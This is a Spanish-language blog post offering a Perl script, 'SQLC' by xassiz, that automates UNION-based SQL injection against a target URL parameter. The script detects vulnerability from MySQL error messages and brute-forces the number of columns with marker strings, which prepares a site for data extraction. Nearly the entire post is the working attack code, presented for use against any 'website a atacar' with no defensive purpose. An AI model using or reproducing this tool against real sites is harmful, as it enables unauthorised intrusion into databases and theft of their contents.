[Tool] SQLC (SQL Columnator) - by xassiz


SQLC (SQL Columnator) - by xassiz



SQLC es mi herramienta en Perl, capaz de devolverte el número de columnas de una web, luego de comprobar si realmente es vulnerable.


Un ejemplo de su uso:




Aquí teneis el código:


#!/usr/bin/perl

use LWP::UserAgent;

if (!$ARGV[0]) {


print q (


      .d8888.  .d88b.  db       .o88b.
      88'  YP .8P  Y8. 88      d8P  Y8
     `8bo.    88    88 88      8P 
       `Y8b.  88    88 88      8b 
     db   8D  `8P  d8' 88booo. Y8b  d8
     `8888Y'   `Y88'Y8 Y88888P  `Y88P'


             [+] Modo de uso:

perl SQLC.pl http://www.target.com/news.php?id=

       -------------------------------

              Coded by xassiz


);

exit 1;

}

print q (


      .d8888.  .d88b.  db       .o88b.
      88'  YP .8P  Y8. 88      d8P  Y8
     `8bo.    88    88 88      8P 
       `Y8b.  88    88 88      8b 
     db   8D  `8P  d8' 88booo. Y8b  d8
     `8888Y'   `Y88'Y8 Y88888P  `Y88P'

);

$target = $ARGV[0];

print("\n [+] Website a atacar: $target \n\n");
print("\n [?] Comprobando vulnerabilidad \n");

$vulnerabilidad = LWP::UserAgent->new() or die;
$comprobacion = $vulnerabilidad->get($target."-1+union+select+69--");

if ($comprobacion->content =~ /The used SELECT statements have a different number of columns/ || $comprobacon->content =~ /You have an error in your SQL syntax/ || $comprobacion->content =~ /mysql_fetch/ || $comprobacion->content =~ /mysql_num_rows/ || $comprobacion->content =~ /MySQL/)
{

print("\n [+] Objetivo Vulnerable \n\n\a");
print("\n [?] Buscando numero de columnas \n");

$count = 2;
$max = 500;

$precolumnator = LWP::UserAgent->new() or die;
$precolumns = $vulnerabilidad->get($target."-1+union+select+0x78617373697a--");

if ($precolumns->content =~ /xassiz/)
{
print("\n [+] La website tiene 1 columna \n\n\a");

exit 1;
}

$inject = ",0x78617373697a";

while ($count <= $max) {  $columnator = LWP::UserAgent->new() or die;
$columns = $vulnerabilidad->get($target."-1+union+select+0x78617373697a".$inject."--");

if ($columns->content =~ /xassiz/)
{
print("\n [+] La website tiene $count columnas \n\n\a");
exit 1;
}

$inject = $inject.",0x78617373697a";
$count ++;
}

print("\n [-] No se encontro el numero de columnas \n\n\a");
exit 1;

} else {

print("\n [-] Objetivo No Vulnerable \n\n\a");

exit 1;

}

#Autor = xassiz;
#Blog  = xassiz.blogspot.com;


Espero que os guste amigos! Saludos
Publicado por en
Etiquetas: , , ,

0 comentarios:

Publicar un comentario